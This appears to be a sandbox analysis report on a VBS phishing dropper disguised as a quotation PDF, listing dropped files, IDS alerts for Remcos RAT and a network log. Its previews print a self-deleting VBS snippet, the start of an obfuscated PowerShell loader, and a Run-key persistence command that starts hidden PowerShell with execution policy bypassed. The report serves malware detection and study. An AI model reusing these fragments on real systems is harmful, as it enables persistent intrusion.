                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xbcbf0e9c, page size 32768, DirtyShutdown, Windows version 10.0
                                                    Category:dropped
                                                    Size (bytes):17301504
                                                    Entropy (8bit):0.8010563547349075
                                                    Encrypted:false
                                                    SSDEEP:6144:adfjZb5aXEY2waXEY24URlCeIAPXAP5APzAPwbndOy8pHAPFJnTJnRbnDotnBQ+z:YVM4e8RyaaKKjLrONseWe
                                                    MD5:CF021BD6FD04DC7D15F22D91AAD24562
                                                    SHA1:59AA184BE269E427A28BC1B952898D95C7952512
                                                    SHA-256:50727BB57BD87DF30341C60AE8C885389C1E5B4037B3C86F8AA030CF2AD1F9DE
                                                    SHA-512:FA4C48FF0519A5EB41710CFD6079DF08A969195F7D1F5E5A0FA3BE8FD5BC9908DCC14BDFC704FA1EEB864BA6C9425F1EBD1B2A73C0614847EFCC0DB05D491359
                                                    Malicious:false
                                                    Preview:....... .......;!......E{ow("...{........................@...../....{..(....|..h.B............................("...{q............................................................................................._...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{].................................U..(....|..................S..(....|...........................#......h.B.....................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):388
                                                    Entropy (8bit):3.565804099946559
                                                    Encrypted:false
                                                    SSDEEP:12:xQ4lA2++ugypjBQMB3D9+gxoIajJVsqMlWlWWlG9Z/0aimi:7a2+SMT9+gj4bkWFlG9yait
                                                    MD5:9F5ABC5F9A54A2E09861C697DD3574F7
                                                    SHA1:9988766052EADE5CF5042B7FABD3F3C934D45B83
                                                    SHA-256:41F75329438ED7BA3BD0B09D3E44F0A874A41F1BF473F81521DC8C5D3E2D67B1
                                                    SHA-512:268D335A1DF39890DC8B94C517A7EB7D85E5E41696B4654C14EA8E98887DC22BAD59EA64A4CD1DA9F45617B6054D7C42EAD291E7A42A882297D0ABC4AAB37833
                                                    Malicious:true
                                                    Preview:O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.W.i.n.d.o.w.s.\.M.i.c.r.o.s.o.f.t...N.E.T.\.F.r.a.m.e.w.o.r.k.\.v.4...0...3.0.3.1.9.\.A.d.d.I.n.P.r.o.c.e.s.s.3.2...e.x.e."...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).
                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):2
                                                    Entropy (8bit):1.0
                                                    Encrypted:false
                                                    SSDEEP:3:Qn:Qn
                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                    Malicious:false
                                                    Preview:..
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6222
                                                    Entropy (8bit):3.7065363774924083
                                                    Encrypted:false
                                                    SSDEEP:96:9KtwChvkkvhkvCCtV22BXDpHW22BXDpHf:Ut54V22B422Bl
                                                    MD5:390BC5943447EC03AA645C23A5E81AC5
                                                    SHA1:C12775459A25671D168457F7C04BC7B0F0135E74
                                                    SHA-256:F7A91646D0EFAE176419EAB20599C1631212392376AFCD64AEF6D0779B0ED008
                                                    SHA-512:E1043EF2154F33AD236AFF19F440EDEB2E3ED269D2043AE2A11FC8E4CDCDC68D0B21BBCFC4D72B4463A9A4F5CB24962EE1078E981EAECAE2B47A109C32B0FC4D
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ...d.......x9.w...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....|d..v....2.w.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlGY.)....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....GY")..Roaming.@......DWSlGY")....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlGY.)....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlGY.)....E.......................m.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlGY.)....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlGY.)....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlGY&)....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlGY')....q...........
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6222
                                                    Entropy (8bit):3.7049608577830746
                                                    Encrypted:false
                                                    SSDEEP:96:5QtwCho8kvhkvCCtV22BXDcHW22BXDpHf:5Qt5LV22BF22Bl
                                                    MD5:94B8B51E1205976A3917A20CACF08BC4
                                                    SHA1:4CA8477945D8ACF673D9DDCB0B64F05AB33FA609
                                                    SHA-256:F5C2195CDAAC9A1DF9126B6DCE8718774C20324EDD62BF78C562E88F729959B2
                                                    SHA-512:BAE891F3F4CE85C64A504A49B9B8142116D8159F006ED2218FFA36292619375745BF04F528915CBF40B243441F24B451A33C3AEF1BFCACB97E8018CD0FC28FE1
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....|d..v.......w.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlGY.)....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....GY")..Roaming.@......DWSlGY")....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlGY.)....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlGY.)....E.......................m.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlGY.)....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlGY.)....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6222
                                                    Entropy (8bit):3.7049608577830746
                                                    Encrypted:false
                                                    SSDEEP:96:5QtwCho8kvhkvCCtV22BXDcHW22BXDpHf:5Qt5LV22BF22Bl
                                                    MD5:94B8B51E1205976A3917A20CACF08BC4
                                                    SHA1:4CA8477945D8ACF673D9DDCB0B64F05AB33FA609
                                                    SHA-256:F5C2195CDAAC9A1DF9126B6DCE8718774C20324EDD62BF78C562E88F729959B2
                                                    SHA-512:BAE891F3F4CE85C64A504A49B9B8142116D8159F006ED2218FFA36292619375745BF04F528915CBF40B243441F24B451A33C3AEF1BFCACB97E8018CD0FC28FE1
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....|d..v.......w.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlGY.)....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....GY")..Roaming.@......DWSlGY")....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlGY.)....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlGY.)....E.......................m.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlGY.)....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlGY.)....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6222
                                                    Entropy (8bit):3.7049608577830746
                                                    Encrypted:false
                                                    SSDEEP:96:5QtwCho8kvhkvCCtV22BXDcHW22BXDpHf:5Qt5LV22BF22Bl
                                                    MD5:94B8B51E1205976A3917A20CACF08BC4
                                                    SHA1:4CA8477945D8ACF673D9DDCB0B64F05AB33FA609
                                                    SHA-256:F5C2195CDAAC9A1DF9126B6DCE8718774C20324EDD62BF78C562E88F729959B2
                                                    SHA-512:BAE891F3F4CE85C64A504A49B9B8142116D8159F006ED2218FFA36292619375745BF04F528915CBF40B243441F24B451A33C3AEF1BFCACB97E8018CD0FC28FE1
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....|d..v.......w.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlGY.)....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....GY")..Roaming.@......DWSlGY")....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlGY.)....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlGY.)....E.......................m.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlGY.)....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlGY.)....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6222
                                                    Entropy (8bit):3.7049608577830746
                                                    Encrypted:false
                                                    SSDEEP:96:5QtwCho8kvhkvCCtV22BXDcHW22BXDpHf:5Qt5LV22BF22Bl
                                                    MD5:94B8B51E1205976A3917A20CACF08BC4
                                                    SHA1:4CA8477945D8ACF673D9DDCB0B64F05AB33FA609
                                                    SHA-256:F5C2195CDAAC9A1DF9126B6DCE8718774C20324EDD62BF78C562E88F729959B2
                                                    SHA-512:BAE891F3F4CE85C64A504A49B9B8142116D8159F006ED2218FFA36292619375745BF04F528915CBF40B243441F24B451A33C3AEF1BFCACB97E8018CD0FC28FE1
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....|d..v.......w.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlGY.)....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....GY")..Roaming.@......DWSlGY")....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlGY.)....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlGY.)....E.......................m.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlGY.)....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlGY.)....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6222
                                                    Entropy (8bit):3.707291399282966
                                                    Encrypted:false
                                                    SSDEEP:48:y9F3wCcbU2p+LhukvhkvklCyw5n2k2KbBXDlI7SogZowE2KbBXDlI7SogZok1:ItwChvkkvhkvCCtV22BXDpHW22BXDpHf
                                                    MD5:EF412DACFF38088B54ACE47F138F412C
                                                    SHA1:1B35FC49E318BA13D0A43000D915ECC55EF82B2A
                                                    SHA-256:BBF2FE4840E27FE7D0504CED2F9D6F515A7D458455DED9E838B08BB2C3ADDFEB
                                                    SHA-512:A81C9A8E89B9E7B78B8D8A8B5EFBCD885717499B0CBF405BE34F5EBF2A6073CF6293AC5A2BFBCDBACCB67DEE760EC728A4AC2259697BC4327ECB1CEA364B7B12
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ...d.......x9.w...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....|d..v....cE.w.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlGY.)....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....GY")..Roaming.@......DWSlGY")....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlGY.)....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlGY.)....E.......................m.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlGY.)....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlGY.)....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlGY&)....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlGY')....q...........
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with very long lines (32626)
                                                    Category:dropped
                                                    Size (bytes):1972246
                                                    Entropy (8bit):3.850463898797347
                                                    Encrypted:false
                                                    SSDEEP:12288:u/bDLzGUTBJpHXd2KP9Mw9On3vft7AJe922sSmZEVEhgpAWtc96jXbgCeppLOCHT:yVZgoXOf1s82LF
                                                    MD5:55E919661F9DE24B48B149E427A7BC4C
                                                    SHA1:1094551A4EBE9137DE836FF8AF6457AEA18B8B6E
                                                    SHA-256:1C0BEEEDDD3E4ED060AF90342743046948DFCD4573745F66B4B697C5B7CC0823
                                                    SHA-512:505113EAC6F00C7ECE2FEC7E520A276CD67BC31A97545FFDE4623D09A5D670F4F2A2DD660F06BF5BF5D87F8F9C0DDCB1CA2659AEF98531D571D2BAD70E6F9041
                                                    Malicious:true
                                                    Preview:..$.z.s.b.D.t. .=. .'.C.:.\.W.i.n.d.o.w.s.\.M.i.c.r.o.s.o.f.t...N.E.T.\.'. .+. .'.F.r.a.m.e.w.o.r.k.\.v.4...0...3.0.3.1.9.\.'. .+. .'.A.d.d.I.n.P.r.o.c.e.s.s.3.2...e.x.e.'.;.....$.X.o.h.s.K. .=. .".?.?.%.y.z.X.V.M.%.".....$.U.e.b.T.a. .=. .'..!:..!'.;...$.X.K.v.H.v. .=. .'.A.'.;.....$.W.Y.v.t.t. .=. .'.T.V.q.Q..!:..!.!:..!M..!:..!.!:..!.!:..!.!:..!E..!:..!.!:..!.!:..!.!:..!/./.8..!:..!.!:..!L.g..!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!Q..!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!g..!:..!.!:..!.!:..!.!:..!.!:..!4.f.u.g.4..!:..!t..!:..!n.N.I.b.g.B.T.M.0.h.V.G.h.p.c.y.B.w.c.m.9.n.c.m.F.t.I.G.N.h.b.m.5.v.d.C.B.i.Z.S.B.y.d.W.4.g.a.W.4.g.R.E.9.T.I.G.1.v.Z.G.U.u.D.Q.0.K.J..!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!B.Q.R.Q..!:..!.!:..!
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with very long lines (394), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):394
                                                    Entropy (8bit):5.173953732907386
                                                    Encrypted:false
                                                    SSDEEP:6:sDuwZH1j0IQHjo5vOkrcsny1R3KbQO0c+EkjAu9aZ5/5wR55wR55wR55p45NHRn:sVVj0PsngkbQpc++3H2iio7
                                                    MD5:FF6137C353C4EA31F07BAD322EAC1411
                                                    SHA1:DCD8952616F49B2C7FC33CAB763B0F96D1927D0B
                                                    SHA-256:B1772714CE47A8871D111CF62EE177C835F80A4DC94FB6136FD4A83F750E81CA
                                                    SHA-512:1E190C37587E53DCF6DCEDBB9A9B9469F7CA31F886E840D7CEDC60A94FA6812EAF39A70A41AFB48E6F648240AD044DAD1FAC34230BC15F74FC27649878D4E7DD
                                                    Malicious:false
                                                    Preview:New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "Update Drivers NVIDEO_khx" -Value "cmd.exe /c start /min `"`" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command `". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' `";exit" -PropertyType "String" -force ; exit
                                                    File type:Unicode text, UTF-16, little-endian text, with CRLF, CR line terminators
                                                    Entropy (8bit):3.4697348686999967
                                                    TrID:
                                                    • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                    • MP3 audio (1001/1) 32.22%
                                                    • Lumena CEL bitmap (63/63) 2.03%
                                                    • Corel Photo Paint (41/41) 1.32%
                                                    File name:Quotation request YN2024-10-07pdf.vbs
                                                    File size:556'730 bytes
                                                    MD5:3d8cf5dfe51b68c3ad7e205faf69eee2
                                                    SHA1:036713fc8f92ad3108fdd7851f7c0658c615f091
                                                    SHA256:a8d4c91b369fdea22a07354ee6da98dca280e3978faf60943fbadf837ffdc53a
                                                    SHA512:9f1f1d1a3e79ed09cab483c657cddaefb079ceb351a34eeee9b008dc892629e9ffaf0999db586d64f1637213ad21b208d6321985281905fe7151b1e769a7b6a3
                                                    SSDEEP:1536:ZJJJJJJJJJJJJJJJJJ7ssssssssssssssssssssssssssssssssssssssssssss9:J
                                                    TLSH:01C49E4766EB8508B0B76F58AE7654790B577E199DBCC28C01CCA85E0FE3A40C961BF3
                                                    File Content Preview:..........'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'. .q.L.E.V.N. .'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'. .........'. .P.r.i.n.t. .u.s.a.g.e. .b.a.S.T.o.....'.............'. .I.n.s.t.a.l.l. .P.r.o.v.i.d.e.r.s.................'. .U.n.i.n.s.t.a.l.l.
                                                    Icon Hash:68d69b8f86ab9a86
                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-10-07T07:09:03.374482+02002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.549706188.114.96.3443TCP
                                                    2024-10-07T07:09:08.864833+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549709188.114.96.3443TCP
                                                    2024-10-07T07:09:08.864833+02002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.549709188.114.96.3443TCP
                                                    2024-10-07T07:09:10.680432+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1185.120.16.93443192.168.2.549710TCP
                                                    2024-10-07T07:09:10.680432+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1185.120.16.93443192.168.2.549710TCP
                                                    2024-10-07T07:09:13.092024+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549712188.114.96.3443TCP
                                                    2024-10-07T07:09:13.092024+02002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.549712188.114.96.3443TCP
                                                    2024-10-07T07:09:16.630552+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.549733192.169.69.263980TCP
                                                    2024-10-07T07:09:27.238212+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549790172.111.244.1003981TCP
                                                    2024-10-07T07:09:28.738179+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549801172.111.244.1003981TCP
                                                    2024-10-07T07:09:29.288703+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549807178.237.33.5080TCP
                                                    2024-10-07T07:09:59.925258+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549975172.111.244.1003981TCP
                                                    2024-10-07T07:10:00.034631+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549977172.111.244.1003981TCP
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 7, 2024 07:08:59.871045113 CEST4970421192.168.2.5191.252.83.213
                                                    Oct 7, 2024 07:08:59.875994921 CEST2149704191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:08:59.876157999 CEST4970421192.168.2.5191.252.83.213
                                                    Oct 7, 2024 07:09:00.482204914 CEST2149704191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:09:00.486345053 CEST4970421192.168.2.5191.252.83.213
                                                    Oct 7, 2024 07:09:00.491210938 CEST2149704191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:09:00.705430984 CEST2149704191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:09:00.714291096 CEST4970421192.168.2.5191.252.83.213
                                                    Oct 7, 2024 07:09:00.719465971 CEST2149704191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:09:00.938736916 CEST2149704191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:09:00.942183971 CEST4970421192.168.2.5191.252.83.213
                                                    Oct 7, 2024 07:09:00.947249889 CEST2149704191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:09:01.160609961 CEST2149704191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:09:01.160770893 CEST4970421192.168.2.5191.252.83.213
                                                    Oct 7, 2024 07:09:01.165757895 CEST2149704191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:09:01.379470110 CEST2149704191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:09:01.379719019 CEST4970421192.168.2.5191.252.83.213
                                                    Oct 7, 2024 07:09:01.384821892 CEST2149704191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:09:01.598306894 CEST2149704191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:09:01.598573923 CEST4970421192.168.2.5191.252.83.213
                                                    Oct 7, 2024 07:09:01.603797913 CEST2149704191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:09:01.817627907 CEST2149704191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:09:01.820182085 CEST4970560710192.168.2.5191.252.83.213
                                                    Oct 7, 2024 07:09:01.825445890 CEST6071049705191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:09:01.825519085 CEST4970560710192.168.2.5191.252.83.213
                                                    Oct 7, 2024 07:09:01.825695992 CEST4970421192.168.2.5191.252.83.213
                                                    Oct 7, 2024 07:09:01.830765963 CEST2149704191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:09:02.044852972 CEST2149704191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:09:02.098087072 CEST4970421192.168.2.5191.252.83.213
                                                    Oct 7, 2024 07:09:02.433752060 CEST2149704191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:09:02.434185982 CEST6071049705191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:09:02.434520960 CEST6071049705191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:09:02.434823990 CEST4970560710192.168.2.5191.252.83.213
                                                    Oct 7, 2024 07:09:02.435329914 CEST4970560710192.168.2.5191.252.83.213
                                                    Oct 7, 2024 07:09:02.440205097 CEST6071049705191.252.83.213192.168.2.5
                                                    Oct 7, 2024 07:09:02.459245920 CEST49706443192.168.2.5188.114.96.3
                                                    Oct 7, 2024 07:09:02.459289074 CEST44349706188.114.96.3192.168.2.5
